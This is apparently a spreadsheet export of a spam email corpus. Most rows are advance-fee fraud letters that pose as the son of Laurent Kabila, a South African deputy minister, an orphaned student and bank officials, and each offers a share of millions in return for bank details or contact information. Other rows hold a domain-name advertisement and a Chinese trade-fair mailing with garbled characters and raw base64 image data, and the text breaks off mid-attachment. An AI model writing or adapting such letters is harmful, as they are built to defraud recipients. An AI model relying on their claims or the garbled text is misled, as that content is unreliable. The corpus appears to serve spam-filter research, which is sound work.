    <t>URGENT BUSINESS PROPOSAL Kindly allow me the modesty of introducing myself. I am Gregory Kabila, the son of the former head of state president of Congo-Kinshasha (then called Zaire) Mr. Laurent Desire Kabila. I am contacting you in order to ask for your assistance on this confidential Business proposal with full financial benefit for both of us. Before I go into further details please be informed that I am writing without any other person(s) pre-knowledge of my contacting you on this transaction. Therefore I will appreciate same attitude to be maintained all through. I have the sum of USD48Million from a secret sale of Diamond by my father before he was assassinated by one of his body guard (Rashid) on January 16th 2001, which I will like you to receive on my behalf due to security reasons, as my narration below will explain. But before I continue be well informed that your share in this transaction has been calculated at 25% of the total sum of USD$48M, 5% for expenses and the rest for my family and me. My father as a real African traditionalist was a polygamist thereby having married so many wives, and my mother being the second wife of my father, My stepbrother Joseph, who is the current president of my country, is the son of the first wife and he does not have any knowledge about this deal. Already president Joseph is using his power to colonize all the money and private property, which my father left behind for the whole family. Now my mother and I are left with nothing in the inheritance of my late father’s wealth. Our situation is seriously critical that we need your assistance to help us receive these funds overseas for proper investment. Let me quickly assure you the 100% safe proof of this transaction because the diamond sales are packaged from the onset in a pattern that shows no direct trace or linkage with us (Kabila family). At present the money is in cash and is secured in a security company as family treasures, as I don’t want to deposit the money in a financial institution for fear of the funds being confiscated The consignment will be released within seven (7) days of my being in receipt of your reply via my email address above only for security reasons. I am waiting for your swift and favorable response, and in case you have any question(s), do not hesitate to contact me. Best Regards, Gregory Kabila. NB:ALTERNATIVE EMAIL ADDRESS(gregorykabila222@post.cz) Семестър по сексознание за напреднали! Спечели 3000 лева в новия конкурс на [URL]http://www.femalelife.bg[/URL]</t>
  </si>
  <si>
    <t>http://www.femalelife.bg</t>
  </si>
  <si>
    <t>719</t>
  </si>
  <si>
    <t>To: R@M\nFrom: SUSAN SHABANGU &lt;ss@yahoo.com&gt;\nDate: Thu, 27 May 2004 16:41:21 +0200</t>
  </si>
  <si>
    <t>Thu, 27 May 2004 16:41:21 +0200</t>
  </si>
  <si>
    <t>SUSAN SHABANGU &lt;ss@yahoo.com&gt;</t>
  </si>
  <si>
    <t>ATTN PLS</t>
  </si>
  <si>
    <t>From: MRS. SUSAN SHABANGU                                                                           MINISTRY OF MINERALS AND ENERGY.\n                                                                             \n10, Kasr El-Aini steet                                                                             \nPRETORIA. SOUTH AFRICA.\n\nGreeting:\nAfter due deliberation with my children, I decided to contact you for \nyour assistance in standing as beneficiary to the sum of US$30.5M (Thirty Million, Five Hundred Thousand United States Dollars Only) First, let me start by introducing myself as MRS. SUSAN SHABANGU, a mother of three children and the Deputy Minister of Minerals and Energy since 1st April 1996 to date under the auspices of the President of South Africa MR THABO MBEKI.\nYou can view my profile at my Website [URL]www.gov.za[/URL] then click on deputy \nministers, and then click on my name (shabangu susan.\n\nTHE PROPOSAL, after the swearing in ceremony making me the Deputy \nMinister of Minerals and Energy, my husband Mr. Ndelebe Shabangu died while he was on an official trip to Trinidad and Tobago in 1996.\nAfter his death, I discovered that he had some funds in a dollar \naccount which amounted to the sum of US$30.5M with a security and finance institution in South Africa of which I will divulge information to you when I get your full consent and support to go for a change of beneficiary and subsequent transfer of the funds into you comfortable and conducive account of your choice.This fund emanated as a result of an over-invoiced contract which he executed with the Government of South Africa.Though I assisted him in getting this  contract but I never knew that it was over-invoiced by him. I am afraid that the government of South Africa might start to investigate on contracts awarded from 1990 to date.\nIf they discover this money in his bank account, they will confiscate \nit and seize his assets here in South Africa and this will definitely affect my political career in government. I want your assistance in opening an account with bankers through my banker so that this fund could be wired into your account directly without any hitch.\n\nAs soon as the fund gets to your account, you are expected to move it \nimmediately into another personal bank account in your country. I will \nsee to it that the account is not traced from South Africa. As soon as you have confirmed the fund into your account, I will send my eldest son with my Attorney to come to your country to discuss on business investments.\n\nFor your assistance, I am offering you 20% of the principal sum which \namounts to US$6,100.000.00 (Six million One Hundred Thousand United \nStates Dollars Only) However, you have to assure me and also be ready to go into agreement with me that you will not elope with my fund. If you agree to my terms, kindly as a matter of urgency send me an email. Due to my sensitive position in the South African Government, I would not WANT you to call me on phone or send a fax to me.\nAll correspondence must be by email to my private email address (sshbangu2002@yahoo.com} If you want to speak with my Banker, that is okay by me. You will have to send down you private telephone /fax number so that I can forward it to him to reach you from time to time this is for security reasons. Please I do not need to remind you of the need for absolute Confidentiality if this transaction must succeed.YOU MUST NOT CALL ME! If you do not feel comfortable with this transaction, \ndo not hesitate to discontinue. Thanks for your anticipated co-peration and my regards to your family. \nYours faithfully, MRS. SUSAN SHABANGU Deputy Minister of Minerals and \nEnergy South Africa.\n\nPLS. DO NOT SEND ME MAIL ON ANY OTHER E-MAIL ADDRESS SEND IT ON THIS \nMAIL BOX FOR SECURITY REASONS  {sshabangu2002@yahoo.com}\nI waiting for your urgent reply.\nThanks and be bless.\nSUSAN SHBANGU \n\n\n</t>
  </si>
  <si>
    <t>www.gov.za</t>
  </si>
  <si>
    <t>2380</t>
  </si>
  <si>
    <t>To: nan\nFrom: david ojoh &lt;davidojoh@hotmail.com&gt;\nDate: Thu, 27 Jul 2006 15:32:15 +0000</t>
  </si>
  <si>
    <t>Thu, 27 Jul 2006 15:32:15 +0000</t>
  </si>
  <si>
    <t>david ojoh &lt;davidojoh@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Please Help me</t>
  </si>
  <si>
    <t>Good day,\n\nMy name is david ojoh.I am a 21yrs old student. My father was a Timber and\nCOCOA merchant . He was poisoned to death by his business associates on one \nof their outings on a business trip.\n\nMy mother died when we were young and before the death of our father on\n15th October, 2004 in a private hospital , he called me on his bed side and \ntold me of a secret deposit he made with one of the prime deposit and \nsecurity Company in Abidjan-Cote D'Ivoire.\n\nHe deposited the sum of Ten Million, five hundred thousand United State\nDollars.(USD$10.500,000) in a box and declare it as African Arts which he\ntold me that he used my name as the next of Kin for the box deposit.\nHe also explained to me that it was because of his wealth that he was\npoisoned by his busines associates. He advised me to seek for whom I can \nconfide in to transfer the fund for onward investment. I am willing to offer \nyou a reasonable amount of this money as compensation for your efforts to \nretrieve the box from the security office and transfer the money into your \nnominated Bank account.\n\nI would like you to send me your telephone and fax numbers for easy\ncommunication so that I can also send you the documents that covers the \ndeposit of the trunk box.\n\nI am waiting for your kind response.\n\nYour's Sincerely,\ndavid ojoh.\n\n_________________________________________________________________\nTestez Windows Llive Mail Beta ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1101</t>
  </si>
  <si>
    <t>To: nan\nFrom: EVANSTIMOTHY &lt;EVANSTIMOTHY@terra.es&gt;\nDate: Thu, 27 Jan 2005 13:19:16 +0000</t>
  </si>
  <si>
    <t>Thu, 27 Jan 2005 13:19:16 +0000</t>
  </si>
  <si>
    <t>EVANSTIMOTHY &lt;EVANSTIMOTHY@terra.es&gt;</t>
  </si>
  <si>
    <t>Business Venture</t>
  </si>
  <si>
    <t>Dear Sir, \n               ACT ACCORDINGLY AND PRIVATELY \nI am Evans Timothy the bills and exchange director at African Express \nBank Plc.\nThough I know that a transaction of this magnitude will make any one \napprehensive and worried, but I am assuring you that everything has \nbeen taken care of and all will be well at the end of the day. I \ndecided to contact you due to the urgency of this transaction.\n      \nMY PROPOSITION;\nI am writing this letter to solicit for support and assistance from you \nto carry out this business opportunity in my department.Lying in an \ninactive account awaiting liquidation is the sum of USD $10.7million \nbelonging to a foreign customer(Herve Garboudes) who was an \npetroleum/gas consultant/contactor with the Nigeria National Petroleum \ncoporation who happens to be deceased during a business trip. He died \nwith his wife\n(Christine Garboudes) on board the Swissair Flight 111 , which crashed \ninto the Atlantic off Nova Scotia in september 2nd 1998. \n \nThe news of this crash was on the news which we have notified his \nrelatives to no avail.\nSee links below for more detail informaion: \n[URL]http://cnnstudentnews.cnn.com[/URL] \n\n[URL]http://cnnstudentnews.cnn.com[/URL]\n\n[URL]http://cnnstudentnews.cnn.com[/URL]\ns/\n       \nEver since he died the bank has been expecting his next of kin to come \nand claim these fund, the NDIC could not liquidate the account because \nI have filled a motion that a next of kin wrote in to the effect. To \nthis effect, they can not release the money unless someone applies for \nit as next of kin, as indicated in our banking guideline. \n\n At this juncture i have decided to do business with you in \ncollaboration with some officials in the bank, to this effect we \nsolicit your assistance in applying as the next of kin and beneficiary \nto Herve Garboudes then the money will be released to you. As we do not \nwant this money to go into the bank treasury as an unclaimed bill,or \nour superiors taking the funds for their own personal use.\n\nThe banking law and guideline stipulates that if such money(s) remains \nunclaimed for a period of up to seven years(7yrs) the money will be \ntransferred into the banks treasury as an unclaimed bill. Our request \nfor a foreigner as next of kin is occasioned by the fact that the \ncustomer was a foreigner and a Nigerian cannot stand as next of kin. To \neffect the immediate transfer of the fund to you as agreed, you must \napply first to the bank as the next of kin to the decease, The fund \nshall then be transferred to you legally in accordance to all laid down \nprocedures governing closure of account and transfer of funds. \nIf you are willing to assist us, we have agree to give you 20 Percent \nof USD $10.7 million  \nNote that this transaction is legal,safe and 100% risk free.\n  Upon receipt of your reply which should includes the following:\n\n1) Your Full Name \n2) Your telephone number for easy communication between us.\n\nI will confidentially work out all modalities for the successful \ntransfer of this money to you as the beneficiary, and send to you by \nfax or email attachement the text of the application, as soon as you \nreceive the text I will further clarify you in details on how to effect \nthe business. \n\nAwait to hear from you \nBest Regards \nEvans Timothy.\n\n\n\n\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://cnnstudentnews.cnn.com http://cnnstudentnews.cnn.com http://cnnstudentnews.cnn.com</t>
  </si>
  <si>
    <t>2036</t>
  </si>
  <si>
    <t>To: nan\nFrom: henry kabore &lt;henrykabore1@hotmail.com&gt;\nDate: Thu, 27 Apr 2006 13:21:02 +0000</t>
  </si>
  <si>
    <t>Thu, 27 Apr 2006 13:21:02 +0000</t>
  </si>
  <si>
    <t>henry kabore &lt;henrykabore1@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">TREAT VERY CONFIDENTIAL &amp; URGENT...  </t>
  </si>
  <si>
    <t>FROM MR HENRY KABORE\nTHE CHIEF AUDITOR INCHARGE\nFOREIGN REMITTANCE UNIT,\nAFRICAN DEVELOPMENT BANK{ADB}.\nOUAGADOUGOU BURKINA FASO.\n\nDear Partner,\nI presumed that all is well with you and your family.\nPlease let this  do not be a surprise message to you because i got your \ncontact information from\nthe international directory in few weeks ago  before i decided to contact \nyou on this magintude and lucrative transaction for our present and future \nsurvival in life.Moreover, i have laid all the solemn trust in you before i \ndecided to disclose this successful &amp; confidential transaction to you.\n\n   I am the Chief Auditor Incharge of the Foreign Remittance Unit of our \nbank and i decided to contact you over this financial transaction worth the \nsum of Nineteen Million, Three Hundred Thousand United States of America \n($19,300,000.00 ) for our present and future success.This is an abandoned \nfund that belongs to one of our bank foreign customers who died along with \nhis entire family  through plane crash disaster since few years \nago.Meanwhile i was very fortune to came across the deceased file when i was \narranging the old and abandoned customers files  in other to sign and submit \nto the entire bank management  for an official re-documentation and audit of \nthe year against 2006.\n\n    Informed clearly that it was stated in our Foreign banking rules and \nregulations which was signed lawfully that if such fund remains unclaimed  \ntill the period of 4 years started  from the date when the beneficiary died, \nthe money will be transferred into the treasury as an unclaimed \nfund.However, it is not authorized by the rules guiding our bank for a \ncitizen of Burkina Faso to make the claim of the fund unless your are a \nforeigner no matter the country different from the deceased.So the request \nof you as a foreigner is necessary to apply for the claim and transfer of \nthe fund smoothly into your reliable bank account as the next of kin to the \ndeceased.\n\n   When the fund is transferred into your account, { 35% } Thirty Five \nPercent  will be for you in respect of all your assistance for the transfer \nof the fund into your account and provision of the bank account where the \nbank will remit the fund into,{ 55% } Fifty Five Percent  will be for me \nbeing the pioneer of the business while the rest { 10% } Ten  Percent will \nbe shared to  respectable Organisations Centers such as Charity , Motherless \nBabies Homes, and helpless disabled people around us in the  World.\n\n   If you are really sure of your, Trustworthy, Accountability and \nconfidentiality on this transaction,contact me and  accept not to change \nyour mind to cheat, or disappoint me  when the fund is transferred into your \naccount.So reply for the assurance with your telephone and fax numbers  \nnecessary to facilitate an easy communication. As soon as you reply me i \nwill let you know the next  procedures to be  follow in order to finalize \nthis transaction immediately.\nI expect your urgent communication.\n\nYours sincerely,\nMr Henry Kabore.\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>4539</t>
  </si>
  <si>
    <t>To: &lt;zzzz4@spamassassin.taint.org&gt;\nFrom: tanya_clark@excite.com\nDate: Thu, 26 Sep 2002 18:11:48 -0600</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 18:11:48 -0600</t>
  </si>
  <si>
    <t>tanya_clark@excite.com</t>
  </si>
  <si>
    <t>$14.95 per year domain names</t>
  </si>
  <si>
    <t>AFFORDABLE DOMAIN REGISTRATION FOR EVERYONE\n\n\nThe new domain names are finally available to the general public at discount prices. Now you can register one of the exciting new .BIZ or .INFO domain names, as well as the original .COM and .NET names for just $14.95. These brand new domain extensions were recently approved by ICANN and have the same rights as the original .COM and .NET domain names. The biggest benefit is of-course that the .BIZ and .INFO domain names are currently more available. i.e. it will be much easier to register an attractive and easy-to-remember domain name for the same price.  Visit: [URL]http://www.domainsforeveryone.com[/URL] today for more info.\n \nRegister your domain name today for just $14.95 at: [URL]http://www.domainsforeveryone.com[/URL]  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.\n \nSincerely,\n \nDomain Administrator\nDomains For Everyone\n\n\nTo remove your email address from further promotional mailings from this company, click here:\n[URL]http://www.centralremovalservice.com[/URL]\n(f4)5088VukL9-796qVfq4651flcG5-695tl29</t>
  </si>
  <si>
    <t>http://www.domainsforeveryone.com http://www.domainsforeveryone.com http://www.centralremovalservice.com</t>
  </si>
  <si>
    <t>4538</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: =?GB2312?B?tdrKrtK7vey159fT1bnX6c6vu+E=?= &lt;webmaster@szdrx.com&gt;\nDate: Thu, 26 Sep 2002 12:08:30 +0100</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 12:08:30 +0100</t>
  </si>
  <si>
    <t>=?GB2312?B?tdrKrtK7vey159fT1bnX6c6vu+E=?= &lt;webmaster@szdrx.com&gt;</t>
  </si>
  <si>
    <t>=?GB2312?B?0rvN+KGwu92hsczsz8KjrNK71bnM7M/C1qotLS0tMjAwM8TqNNTCMcjVLS00?=</t>
  </si>
  <si>
    <t>=?GB2312?B?yNW12squ0ru97NbQufq5+rzKtefX08nosbihorXn19PUqsb3vP6horHtw+bM?=  =?GB2312?B?+dew1bnAwLvhu7bTrbGow/uyztW5o6E=?= To: fma@zzzzason.org Content-Type: multipart/mixed;  boundary="=_NextPart_2rfkindysadvnqw3nerasdf";charset="GB2312" MIME-Version: 1.0 Reply-To: webmaster@szdrx.com Date: Thu, 26 Sep 2002 19:11:11 +0800 X-Priority: 3 X-Mailer: EhooSend 2002d This is a multi-part message in MIME format --=_NextPart_2rfkindysadvnqw3nerasdf Content-Type: text/plain Content-Transfer-Encoding: 7bit ®_x0002_»_x0004_9_x0004_µ_x0002_x*_x0005_ð_x0005_y_x0005_k_x001F_200241--49_x0004_¸_x0002_¼ û_x0005_y_x0005_¡&gt;_x0006_!_x0004_ ª_x0005_y_x0005_ì¼~_x0005_[URL]http://www.e-dowell.com5[/URL]_x0004_ý_x0004_ 4_x0001_§_x0005_£5_x0004_y_x0005_~_x0004_y_x0002_p_x0006_®_x0002_ìÈy_x0005_¹_x0003_¶_x0006_b_x0008_ :_x0003_y_x0005_s_x0004_ª_x0003_»_x0004_»_x0004_5_x0002_5_x0001_µ_x0004_¢_x0002_ì_x0018_ù_x0001_l_x0003_µ_x0004_ð_x0004_4_x0001_y_x0005_®_x0005_»_x0004_ 2003414~_x0005_p_x0006_®_x0002_»_x0004_9_x0004_µ_x0002_x*_x0005_ð_x0005_y_x0005_c_x0018_ ±_x0002_µ_x0005_½_x0006_9_x0004_þ_x0002_ã_x0005_ìÈµ_x0004_3_x0004_c_x0002_ x_x0001_¯¾|_x0003_¬_x0001_¸_x0005_í_x0004_o_x0004_¯_x0003_&amp;ð~0755-8350245883502441í_x0004_o_x0004_ 2003®_x0002_»_x0004_9_x0004_[ü_x0005_:_x0001_c_x0001_£_x0005_20020737] *_x0005_xá_x0004_µ_x0001_·ð_x0005_y_x0005_ 2003 the 11th China International Electronic Equipments and  Components &amp; Surface Mounting Technology Fair   â_x0003_µ_x0004_g_x0004_9_x0004_g_x0004_b_x0018_5_x0006_§_x0005_µ_x0005_4_x0001_u_x0003_è_x0005_µ_x0004_y_x0005_  ±_x0002_úH 2003414  TIMEApril  1st to 4th , 2003  5_x0006_ú8 9_x0004_¸_x0002_¼y_x0002_û_x0005_y_x0005_  ADDCHINA HI-TECH FAIR EXHIBITION CENTRE SHENZHEN  ü_x0005_»_x0003_: ;_x0004_§ÙºÜy_x0003_g_x0004_  Approver: Ministry of Science and Technology of People's Republic of China  eÍ»_x0003_/Sponsors:           9_x0004_g_x0004_    Chinese Institute of Electronics (CIE)  -_x0004_eÍ»_x0003_/CO-ORGANIZER         9_x0004_|½µ_x0004_-_x0004_  China Semiconductor Association  9_x0004_ñ_x0004_        China Electronics News Agency  0_x0004_eÍ»_x0003_/Organizer    9_x0004_g_x0004_y_x0005_  Exhibition Dept. of Chinese Institute of Electronics  6_x0004_µ_x0002_µ_x0004_¹_x0007_þ_x0002_  SHENZHEN DOWELL INDUSTRIAL CO.,LTD  ª_x0003_±_x0005_¤_x0005_y_x0005_2003NØ6ß5_x0004_y_x0005_»_x0004_ª_x0003_»_x0004_»_x0004_  y_x0005_·_x0001_ »_x0004_*_x0005_xá_x0004_µ_x0001_·ð_x0005_            !_x0001_4_x0005_!_x0006_y_x0004_  r_x0007_·_x0001_                                         uXù_x0004_                   ò_x0004_                                    ô_x0003_  l_x0003_¾_x0006_p_x0006_úÈ¹_x0002_µ_x0004_¾_x0002_y_x0005_ y_x0005_:     9½_x0001_               ð_x0005_   USD 2800/9m2  USD 300/m2  USD 10/m2  A    RMB 7800/9m2  RMB 800/m2  RMB 25/m2  B    RMB 6800/9m2  RMB 700/m2  RMB25/m2  â_x0001_8_x0003_»_x0004_a_x0001_a_x0004_¶_x0001_u_x0005_4_x0005_»_x0004_p300µ_x0004_c  ï_x001F_úh     28000   ³_x0004_  10000     18000             +_x0002_  4000      10000 °_x0002_  2000                 8000  °_x0006_ð_x0005_  2000                3800    ±_x0001_ 1000/             3800   2800  â_x0005__x0002_{_x0003_&lt;_x0005_i_x001E_210mm*285mm ·_x0005_:     6_x0004_µ_x0002_µ_x0004_¹_x0007_þ_x0002_  #_x0004_ §_x0005_    c_x0001_ 4000027719200016455  ¯_x0003_&amp;: 6_x0004_µ_x0002_µ_x0004_¹_x0007_þ_x0002_  ·_x0005_:8_x0004_·7_x0005_B2603    ±_x0002_ú_x0008_518034  ð~:(86) 755-83503744835024418350244883502458 úh(86)755-83088130  83502435  ·_x0005_Website: [URL]www.e-dowell.com[/URL]    [URL]www.szdrx.com[/URL] E-mail:webmaster@szdrx.com õ_x0003_:          --=_NextPart_2rfkindysadvnqw3nerasdf Content-Type: application/octet-stream;         name="2003y_x0005_¼_x0002_¯¾.jpg" Content-Transfer-Encoding: base64 Content-Disposition: attachment;         filename="2003y_x0005_¼_x0002_¯¾.jpg" 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 